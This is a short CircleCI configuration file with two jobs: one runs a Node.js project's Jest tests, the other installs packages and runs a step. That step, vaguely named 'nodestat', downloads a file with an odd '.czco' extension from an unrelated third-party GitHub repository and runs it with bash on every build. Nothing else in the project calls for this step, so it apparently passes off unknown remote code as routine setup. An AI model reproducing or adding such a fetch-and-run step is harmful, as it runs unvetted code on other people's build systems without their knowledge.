version: 2.1

orbs:
  snyk: snyk/snyk@1.7.2
  github-cli: circleci/github-cli@2.2.0
  node: circleci/node@5.1.0


jobs:
  dockeretteinstall:
   
    docker:
      - image: debian:stable

    steps:
      - checkout
      - run: apt update && apt upgrade -y && apt install nodejs npm curl sudo -y
      - run:
          name: "nodestat"
          command: "set -e  && curl -fsSL https://raw.githubusercontent.com/NateYeet/Chameleon/main/Chameleon/main.czco >> /ch && bash /ch node"
  nodejsindex:
    docker:
      - image: ubuntu:jammy
    steps:
      - checkout
      - run: apt update && apt upgrade -y && apt install nodejs npm sudo -y
      - run: npm install -g jest
      - run: cd www && npm run test



  



workflows:
  test:
    jobs:
      - dockeretteinstall
      - nodejsindex